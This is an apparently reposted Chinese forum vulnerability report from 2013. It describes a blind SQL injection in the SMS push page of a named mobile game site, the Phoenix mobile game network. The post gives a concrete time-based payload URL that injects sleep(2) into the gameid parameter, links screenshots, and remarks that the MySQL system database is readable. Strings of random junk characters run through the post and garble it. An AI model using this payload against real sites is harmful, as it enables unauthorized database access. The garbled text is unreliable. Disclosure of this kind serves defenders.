简要描述:
( f7 L' s4 d7 F: w凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。1 E. X/ k# H# C5 V) n
& z8 A1 W O3 ~, q$ n, u- g; h& L
详细说明:* I3 x5 T& w9 W% K7 `+ ^
存在SQL盲注url:
. M' u3 Z. l5 s- @2 ^fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1/ e" z$ O' U4 B4 x, C
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
7 z+ r8 P" ]) N j3 Ghttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
/ y) D' o" x1 B6 E$ }' U1 Zhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg8 N0 k: l0 [% u
% F1 b6 |! U2 d2 N$ f* \# ~
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对